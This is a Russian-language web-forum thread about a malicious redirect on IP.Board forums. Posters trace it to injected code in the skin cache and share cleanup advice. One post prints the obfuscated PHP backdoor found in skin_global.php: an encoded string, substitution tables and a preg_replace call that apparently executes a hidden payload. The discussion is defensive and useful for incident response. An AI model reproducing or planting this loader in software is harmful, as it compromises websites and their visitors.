Jump to content
Дизайн и модификация IPS Community IPBSkinsBETA
Search In
  • More options...
Find results that contain...
Find results in...
Sign in to follow this  
AlexAuto

Вирус в Skin от Evanescence

Recommended Posts

решил сделать тему так как хочу уберечь других от покупки скина у Evanescence от IBSkin.xxx

купил у них скин 18 числа и сразу установил, 19 числа посещаемость упала в двое, 23 числа пользователь написал что его антивирус матерится на форум RedirDL-inf [Trj], 25 числа начал сам искать вирус, просиходит редирект на сайт xxxx://url4short.info/692f6991 при переходе с поисковиков на форум. перерыл весь движок, поменял все файлы движка, не чего не дало, в итоге попросил специалистов, несколько человек копалось в БД и в файлах, не чего, искали по запросам, и в итоге тоже не чего не нашли. посещаемость упала с 60000 до 10000, не кто не смог помочь в поисках проблемы, в итоге сегодня разобрались что все тянется со скриптов скина, скин удалили кеш почистили и все стало четко,

Share this post


Link to post
Share on other sites

Это довольно серьезное обвинение, и нужны более весомые доказательства чем "у меня на форуме нашелся вирус". Далеко не факт, что вирус поставлялся вместе с шаблонам. Вы открывали дистрибутив скина, нашли в нем злополучный скрипт? Если версия форума та, что указана в профиле, то у меня для вас "хорошие" новости... Вы в курсе событий про выходы последних патчей безопасности?

 

60К хостов в день?? Это таки немалая посещаемость,

несколько человек копалось в БД и в файлах, не чего, искали по запросам, и в итоге тоже не чего не нашли.

Такие редиректы как правило палятся очень лекго, и искать там особо нечего. Выявляется тип редиректа - серверный или жс и, исходя из типа, проводятся поиски начиная с местах где чаще всего его прописывают.

Share this post


Link to post
Share on other sites

да конечно, скрипт подгружаемый по куки с другого сервера, и все запакованно eval(function(p,a,c,k,e,d)

версия IPB последняя, про безопастность вкурсе,

Share this post


Link to post
Share on other sites

У вас в профиле нет даже адреса вашего форума, и как вам доверять после этого?

 

Выложите куда-нибудь и скиньте в личку ссылку на дистрибутив скина - и мне будет интересно поискать, и вам будет полезно, если окажется, что проблема все же не в скине.

Share this post


Link to post
Share on other sites
У вас в профиле нет даже адреса вашего форума, и как вам доверять после этого?

Это не причина не доверять.

В 2008 (да и в 2009 вроде) при регистрации еще не требовалось вписывать Board URL.

 

А еще раньше версию форума тоже не надо было указывать

Share this post


Link to post
Share on other sites

да конечно, скрипт подгружаемый по куки с другого сервера

Скрипт где был обнаружен, в дистрибутиве или на рабочем форуме? Если на форуме и при этом не был проверен дистрибутив, тут говорить не о чем. То, что вредоносный скрипт оказался в исходном коде это естественно, это же жс скрипт.

 

Это не причина не доверять.

@Fisana, речь не о доверии, а о некомпетентности автора. ТС конкретно так и не указал, есть ли этот вредоносный код в дистрибутиве шаблона или нет. Поэтому здесь сложно доверять его словам.

Share this post


Link to post
Share on other sites

да конечно, скрипт подгружаемый по куки с другого сервера, и все запакованно eval(function(p,a,c,k,e,d)версия IPB последняя, про безопастность вкурсе,

 

Это вирус Вашего Форума, а не шаблона. Так, как я сталкивался с этим неоднократно.

 

Простой пример

Знакомый пишет.

У меня через гугл на форум попасть не возможно, переадресовывает на другой форум. Шаблон у него стоял, который использовал красоты. (Смена цвета и тд).

Взял, удалил его, и все пропало, все работает. Думаю что-то не то. Полез на фтп, в основном все файлы, включая конфиг были заражены. Прописан код Eval(6.

А причина была простая, не стоит храниться пароли, в фтп менеджерах, и стоит периодически их менять. Но есть вероятность хостинг. Сообщите им.

Вирусы сидят, в файлах с расширение php, но лучше проверить все.

 

Примеры, где я чистил.

conf_global.php

/cache/skin_cache

/cache/lang_cache

/hooks

/ips_kernel

/public/style_images/ (Ваш шаблон). В моем случае, в папке с шаблонов было много php файлов, и все заражены.

 

Можно ssh поиском, чтобы обнаружить в каких файлах используется этот вредоносный код.

Share this post


Link to post
Share on other sites

Читать: http://forums.odforce.net/index.php?/topic/16575-rss-feeds-link-problem/

 

У меня данная зараза сидела в кеше шаблона cache/skin_cache/что-то_там_1/skin_global.php (по памяти). В середине файла идет код инклуда JS (легче сделать поиск по переменной $mds )

 

Последний патч устраняет дыру.

 

Я не специалист, но по моему, также перестройка кеша удалит все.

Edited by mizer

Share this post


Link to post
Share on other sites

Да, бяда. Такая же проблема. Появилась еще в декабре. Редирект на вышеуказанный сайт. Думал что почистил, но сейчас проверил, редирект снова стал проявляться. Вот вишь засада, и как его вынести полностью? Может кто напишет подробно как с сей напастью бороться, искать зараженные файлы?

Share this post


Link to post
Share on other sites

Искать шеллы.

Сменить пароли (бд, можно фтп).

Читать соответствующие топики на форуме где эта тема обсуждалась уже не один раз.

Share this post


Link to post
Share on other sites

Ну эт понятно. Я рассчитывал больше на подробности, ну ладно, кто ищет собсно, тот найдет. В файле /cache/skin_cache/cacheid_Х/skin_global.php нашел лишнее:

$k='bf05f0304ee14efae6ce9165e0a2c194';
$mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[bs/uBvR(wvzgBgP[bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[bZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq';
$jsa='jEK!u>WQ^CfRP98_%Xwtk&;5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6';
$jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@';
$i='#c#'.substr($mds,213,1);
$ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css');

 

Я так понимаю это и есть шелл?

Share this post


Link to post
Share on other sites

Да, это и есть одна из его разновидностей. Перестройте кеш, чтобы убедится что код находился только в кеше а не в шаблоне, иначе при перестроении он снова появится.

Share this post


Link to post
Share on other sites

Да, кэш перестроил, код пропал. Пока вродь не редиректит.

Share this post


Link to post
Share on other sites

Блин, та же беда. Подскажите плс лоху. Этот код надо найти через админку в файлах и стереть целиком или там есть какие заморочки и лохам лучче не соваца?

С уважением

Share this post


Link to post
Share on other sites

Точно такая же проблема, уже все файлы на все возможные совпадения проверил, всю базу, вообще все что можно. Убираю код из skin_global.php и через некоторое время он снова перезаписывается :(

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...